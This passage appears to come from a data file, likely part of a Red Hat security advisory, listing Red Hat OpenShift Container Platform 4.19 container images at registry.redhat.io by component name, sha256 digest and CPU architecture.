"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
